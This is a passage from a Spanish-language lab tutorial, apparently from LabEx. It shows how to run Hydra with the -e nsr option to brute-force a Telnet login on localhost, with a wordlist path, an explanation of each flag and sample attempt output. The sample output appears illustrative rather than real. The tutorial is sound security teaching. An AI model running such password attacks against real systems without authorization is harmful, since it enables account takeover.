Ejecutar Hydra con la opción -e nsr
:
Abra su terminal en el directorio ~/project
y ejecute el siguiente comando:
hydra -l labex -P /usr/share/wordlists/metasploit/unix_passwords.txt -vV -e nsr telnet://localhost
Desglosemos este comando:
hydra
: El comando para ejecutar la herramienta Hydra.
-l labex
: Especifica el nombre de usuario a probar. Estamos usando labex
, el usuario predeterminado en la VM de LabEx.
-P /usr/share/wordlists/metasploit/unix_passwords.txt
: Especifica un archivo de lista de contraseñas. Este archivo contiene una lista de contraseñas comunes.
-vV
: Habilita el modo detallado, mostrando cada intento de inicio de sesión.
-e nsr
: Esta es la opción clave para este paso. Le dice a Hydra que intente:
n
: Contraseña nula (cadena vacía).
s
: Nombre de usuario como contraseña.
r
: Nombre de usuario invertido como contraseña.
telnet://localhost
: Especifica el servicio y la dirección de destino. telnet
indica el protocolo Telnet, y localhost
se refiere a la máquina local.
Hydra intentará ahora iniciar sesión en el servicio Telnet utilizando el nombre de usuario y la lista de contraseñas especificados, así como la contraseña nula, el nombre de usuario y el nombre de usuario invertido. La salida mostrará cada intento de inicio de sesión y si fue exitoso.
Ejemplo de salida (puede variar según la lista de contraseñas):
Hydra v9.1 (c) 2020 by van Hauser/THC - use allowed only for legal purposes.
Hydra is starting...
[DATA] 1 task, 1 server, 1337 service(s)
[DATA] attacking service telnet on port 23
[DATA] attacking target localhost
[ATTEMPT] target localhost - login: 'labex' - pass: ''
[23][telnet] host: localhost login: labex password:
[ATTEMPT] target localhost - login: 'labex' - pass: 'labex'
[23][telnet] host: localhost login: labex password: labex
[ATTEMPT] target localhost - login: 'labex' - pass: 'xebal'
[23][telnet] host: localhost login: labex password: xebal
...
Debido a que configuramos Telnet para permitir el inicio de sesión sin autenticación, es probable que Hydra encuentre un inicio de sesión exitoso con una contraseña nula.